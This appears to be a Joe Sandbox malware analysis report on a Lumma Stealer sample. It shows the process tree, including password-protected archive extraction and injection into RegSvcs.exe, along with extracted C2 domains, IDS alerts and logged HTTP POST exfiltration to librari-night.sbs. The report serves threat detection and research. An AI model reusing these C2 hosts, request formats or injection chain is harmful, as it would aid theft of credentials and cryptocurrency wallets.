Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1560657
MD5:b570fcbe697ef79db835d9b654974874
SHA1:cf82bcfafbd35a42a4cb7893b4acae9941ee9f5a
SHA256:34255258fadbcfaa0d061722ae85b5e25bcc3b90f2f10825b75d0cb4f27e1a8b
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Contains functionality to register a low level keyboard hook
Drops password protected ZIP file
Injects a PE file into a foreign processes
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables security privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6536 cmdline: "C:\Users\user\Desktop\file.exe" MD5: B570FCBE697EF79DB835D9B654974874)
    • cmd.exe (PID: 5468 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • mode.com (PID: 5784 cmdline: mode 65,10 MD5: BEA7464830980BF7C0490307DB4FC875)
      • 7z.exe (PID: 6460 cmdline: 7z.exe e file.zip -p1299923009167529232566422481 -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
      • 7z.exe (PID: 3056 cmdline: 7z.exe e extracted/file_4.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
      • 7z.exe (PID: 3720 cmdline: 7z.exe e extracted/file_3.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
      • 7z.exe (PID: 4568 cmdline: 7z.exe e extracted/file_2.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
      • 7z.exe (PID: 3140 cmdline: 7z.exe e extracted/file_1.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
      • attrib.exe (PID: 320 cmdline: attrib +H "Installer.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • Installer.exe (PID: 1352 cmdline: "Installer.exe" MD5: 18EB75EF50B1A51600E686B6B9DE277E)
        • RegSvcs.exe (PID: 1248 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["peepburry828.sbs", "processhol.sbs", "3xp3cts1aim.sbs", "p3ar11fter.sbs", "p10tgrace.sbs"]}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000B.00000003.2122410966.00000000035F0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
      0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
        decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
          SourceRuleDescriptionAuthorStrings
          12.2.RegSvcs.exe.400000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
            11.3.Installer.exe.35f0000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
              11.3.Installer.exe.35f0000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-22T05:02:08.103646+010020283713Unknown Traffic192.168.2.549707172.67.206.172443TCP
                2024-11-22T05:02:10.178731+010020283713Unknown Traffic192.168.2.549708172.67.206.172443TCP
                2024-11-22T05:02:12.507354+010020283713Unknown Traffic192.168.2.549709172.67.206.172443TCP
                2024-11-22T05:02:14.687563+010020283713Unknown Traffic192.168.2.549710172.67.206.172443TCP
                2024-11-22T05:02:16.846185+010020283713Unknown Traffic192.168.2.549712172.67.206.172443TCP
                2024-11-22T05:02:19.116598+010020283713Unknown Traffic192.168.2.549715172.67.206.172443TCP
                2024-11-22T05:02:21.483449+010020283713Unknown Traffic192.168.2.549723172.67.206.172443TCP
                2024-11-22T05:02:25.011304+010020283713Unknown Traffic192.168.2.549736172.67.206.172443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-22T05:02:08.832943+010020546531A Network Trojan was detected192.168.2.549707172.67.206.172443TCP
                2024-11-22T05:02:11.039904+010020546531A Network Trojan was detected192.168.2.549708172.67.206.172443TCP
                2024-11-22T05:02:25.786239+010020546531A Network Trojan was detected192.168.2.549736172.67.206.172443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-22T05:02:08.832943+010020498361A Network Trojan was detected192.168.2.549707172.67.206.172443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-22T05:02:11.039904+010020498121A Network Trojan was detected192.168.2.549708172.67.206.172443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-22T05:02:06.219890+010020576971A Network Trojan was detected192.168.2.5631231.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-22T05:02:08.103646+010020576591Domain Observed Used for C2 Detected192.168.2.549707172.67.206.172443TCP
                2024-11-22T05:02:10.178731+010020576591Domain Observed Used for C2 Detected192.168.2.549708172.67.206.172443TCP
                2024-11-22T05:02:12.507354+010020576591Domain Observed Used for C2 Detected192.168.2.549709172.67.206.172443TCP
                2024-11-22T05:02:14.687563+010020576591Domain Observed Used for C2 Detected192.168.2.549710172.67.206.172443TCP
                2024-11-22T05:02:16.846185+010020576591Domain Observed Used for C2 Detected192.168.2.549712172.67.206.172443TCP
                2024-11-22T05:02:19.116598+010020576591Domain Observed Used for C2 Detected192.168.2.549715172.67.206.172443TCP
                2024-11-22T05:02:21.483449+010020576591Domain Observed Used for C2 Detected192.168.2.549723172.67.206.172443TCP
                2024-11-22T05:02:25.011304+010020576591Domain Observed Used for C2 Detected192.168.2.549736172.67.206.172443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-22T05:02:06.453678+010020576581Domain Observed Used for C2 Detected192.168.2.5498171.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-22T05:02:06.219890+010020576681Domain Observed Used for C2 Detected192.168.2.5631231.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-22T05:02:19.848871+010020480941Malware Command and Control Activity Detected192.168.2.549715172.67.206.172443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-22T05:02:21.488972+010028438641A Network Trojan was detected192.168.2.549723172.67.206.172443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: https://librari-night.sbs:443/apihv.default-release/key4.dbPKAvira URL Cloud: Label: malware
                Source: https://librari-night.sbs:443/apitPKAvira URL Cloud: Label: malware
                Source: https://librari-night.sbs/bAvira URL Cloud: Label: malware
                Source: https://librari-night.sbs/=Avira URL Cloud: Label: malware
                Source: https://librari-night.sbs/apiAA==Avira URL Cloud: Label: malware
                Source: 11.3.Installer.exe.35f0000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["peepburry828.sbs", "processhol.sbs", "3xp3cts1aim.sbs", "p3ar11fter.sbs", "p10tgrace.sbs"]}
                Source: C:\Users\user\AppData\Local\Temp\main\extracted\Installer.exeReversingLabs: Detection: 71%
                Source: file.exeReversingLabs: Detection: 31%
                Source: file.exeVirustotal: Detection: 14%Perma Link
                Source: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpString decryptor: p3ar11fter.sbs
                Source: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpString decryptor: 3xp3cts1aim.sbs
                Source: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpString decryptor: peepburry828.sbs
                Source: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpString decryptor: p10tgrace.sbs
                Source: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpString decryptor: processhol.sbs
                Source: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpString decryptor: processhol.sbs
                Source: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpString decryptor: TeslaBrowser/5.5
                Source: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpString decryptor: - Screen Resoluton:
                Source: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpString decryptor: - Physical Installed Memory:
                Source: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpString decryptor: Workgroup: -
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_004195D1 CryptUnprotectData,12_2_004195D1
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.5:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.5:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.5:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.5:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.5:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.5:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.5:49723 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.5:49736 version: TLS 1.2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040367D GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_0040367D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004031DC FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_004031DC
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_00247978 FindFirstFileW,FindFirstFileW,free,5_2_00247978
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 11_2_0025A151 FindFirstFileExW,11_2_0025A151
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_0024881C free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free,5_2_0024881C
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\extractedJump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx]12_2_00424800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h12_2_00441160
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edx+4B5D9729h]12_2_0040CA6A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ebp, word ptr [eax]12_2_004412A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov word ptr [eax], cx12_2_004195D1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-05h]12_2_0040BDB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov esi, edx12_2_00427E50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-69h]12_2_00427E50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [eax], bl12_2_0040CEF5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx eax, byte ptr [ebp+edi+00000090h]12_2_00403060
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov esi, edx12_2_00429872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-532F9054h]12_2_0040A874
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp eax12_2_00418940
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ebp, dword ptr [ecx+esi*4-000009BCh]12_2_00409150
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+000011E4h]12_2_00425150
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ecx, eax12_2_00425A75
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ecx, eax12_2_00425A75
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-3DC4CF7Bh]12_2_004252A2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ecx, eax12_2_004272A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 6DBC3610h12_2_0043C310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-29h]12_2_0041DBD4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-6Ah]12_2_0041DBDB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edi, word ptr [edi+ecx*4]12_2_00407BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+34h]12_2_00407BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]12_2_00407BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h12_2_0042C470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp dword ptr [00446B78h]12_2_0041ECF4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 1B6183F2h12_2_00429487
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h12_2_00423560
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then push eax12_2_00418D27
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 1B6183F2h12_2_00429525
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edx, byte ptr [eax+edi-3EB41192h]12_2_0042964F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-29h]12_2_0041DE73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax+08h]12_2_0041B634
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]12_2_0042BED0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edx, byte ptr [edi+ecx+26702EC9h]12_2_0041A6A3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]12_2_00401F50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov esi, edx12_2_0042975B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 1B6183F2h12_2_0043BF10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ecx, edx12_2_004237C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edi, byte ptr [esp+esi+04h]12_2_0043BFC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ebx, edx12_2_004277BD

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2057658 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (librari-night .sbs) : 192.168.2.5:49817 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057659 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI) : 192.168.2.5:49708 -> 172.67.206.172:443
                Source: Network trafficSuricata IDS: 2057668 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (processhol .sbs) : 192.168.2.5:63123 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057697 - Severity 1 - ET MALWARE Observed DNS Query to Lumma Stealer Domain (processhol .sbs) : 192.168.2.5:63123 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057659 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI) : 192.168.2.5:49710 -> 172.67.206.172:443
                Source: Network trafficSuricata IDS: 2057659 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI) : 192.168.2.5:49715 -> 172.67.206.172:443
                Source: Network trafficSuricata IDS: 2057659 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI) : 192.168.2.5:49709 -> 172.67.206.172:443
                Source: Network trafficSuricata IDS: 2057659 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI) : 192.168.2.5:49723 -> 172.67.206.172:443
                Source: Network trafficSuricata IDS: 2057659 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI) : 192.168.2.5:49736 -> 172.67.206.172:443
                Source: Network trafficSuricata IDS: 2057659 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI) : 192.168.2.5:49707 -> 172.67.206.172:443
                Source: Network trafficSuricata IDS: 2057659 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI) : 192.168.2.5:49712 -> 172.67.206.172:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49707 -> 172.67.206.172:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49707 -> 172.67.206.172:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49708 -> 172.67.206.172:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49708 -> 172.67.206.172:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49715 -> 172.67.206.172:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49736 -> 172.67.206.172:443
                Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49723 -> 172.67.206.172:443
                Source: Malware configuration extractorURLs: peepburry828.sbs
                Source: Malware configuration extractorURLs: processhol.sbs
                Source: Malware configuration extractorURLs: 3xp3cts1aim.sbs
                Source: Malware configuration extractorURLs: p3ar11fter.sbs
                Source: Malware configuration extractorURLs: p10tgrace.sbs
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 11_2_00251280 std::_Xinvalid_argument,GetTickCount,GetTickCount,Sleep,GetTickCount,GetModuleHandleW,GetSystemInfo,FindResourceW,LoadResource,URLDownloadToFileA,ShellExecuteA,GetProcAddress,LockResource,GetProcAddress,VirtualProtect,Concurrency::cancel_current_task,11_2_00251280
                Source: Joe Sandbox ViewIP Address: 172.67.206.172 172.67.206.172
                Source: Joe Sandbox ViewIP Address: 176.9.162.205 176.9.162.205
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 172.67.206.172:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 172.67.206.172:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49715 -> 172.67.206.172:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 172.67.206.172:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49723 -> 172.67.206.172:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 172.67.206.172:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49736 -> 172.67.206.172:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49712 -> 172.67.206.172:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: librari-night.sbs
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 46Host: librari-night.sbs
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=V31ZB5AUZ1ZALSPCTTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12834Host: librari-night.sbs
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=POBUP2MJIL1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15034Host: librari-night.sbs
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=U4WC6T04TDNKP3M5UHAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20572Host: librari-night.sbs
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=AN34G8DXPIQAPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1233Host: librari-night.sbs
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XOQV0YRX0LEO9RK9TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 551350Host: librari-night.sbs
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 81Host: librari-night.sbs
                Source: global trafficHTTP traffic detected: GET /4Ak49WQH0GE3Nr.mp3 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: joxi.netConnection: Keep-Alive
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
